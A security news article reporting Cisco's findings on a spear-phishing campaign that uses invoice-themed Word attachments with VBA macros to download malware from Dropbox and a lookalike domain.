Spear phishers abuse Word programming feature to infect targets

Share this article:
Agents with a state online health insurance exchange in Minnesota may have had data compromised.
Hackers abused Microsoft's Visual Basic for Applications (VBA) to rig email attachments, Cisco reveals.

An attack group with a penchant for high-profit businesses, including those in the banking, oil and entertainment industries, is using a spear phishing campaign to target victims, Cisco warns.

Craig Williams, technical leader of Cisco's Threat Research Analysis and Communications (TRAC) team, delved into attackers' exploits in a Monday blog post. According to Williams, the group lures targets with malicious emails crafted to look like business invoices.

Those who take the bait, or phishing emails crafted for specific company members, download malware via a malicious Microsoft Word attachment. When opened, the file is rigged to download a malicious executable, Williams wrote. The malware contacts several domains during this process, including a Dropbox cloud-based file-sharing service, where attackers host malware payloads.

In email correspondence with SCMagazine.com, Williams explained that hackers leveraged a Microsoft programming language, Visual Basic for Applications, to lay their trap.

“This is really an abused feature,” Williams said. “The attacks are using Visual Basic Scripting for Applications to cause an On-Open macro to fire when the victim opens the Word document. This will result in downloading an executable and launching it on the victim's machine. It's quite an old technique,” he added.

Along with the Dropbox url, other domains the malware contacted, such as londonpaerl.co.uk (a close match for legitimate site, londonpearl.co.uk), were used to host backdoors, though Cisco blocked the malware from its clients.

According to Williams, Cisco thwarted attacks from the group throughout May and June, though the majority of attacks occurred last month.

The spear phishing campaign has, so far, targeted organizations in Europe, Williams wrote, adding that hackers were likely motivated by “monetary gain.”

Next week, Cisco plans to divulge more information on the group's exploits, specifically the malware used by attackers and their obfuscation techniques, the company blog post said.

Share this article:
You must be a registered member of SC Magazine to post a comment.

Sign up to our newsletters

More in News

Researchers observe more than a hundred connections to 'Backoff' sinkhole

Researchers with Kaspersky Lab were able to sinkhole two command-and-control servers used by certain Backoff point-of-sale malware samples.

Judge lifts stay but Microsoft won't hand over emails during appeal

A judge has lifted a suspension of a previous order compelling Microsoft to hand over customer emails stored on a server in Ireland.

Home Depot investigates possible payment card breach

Home Depot investigates possible payment card breach

Home Depot said on Tuesday that it is working with its banking partners and law enforcement to investigate a possible data breach.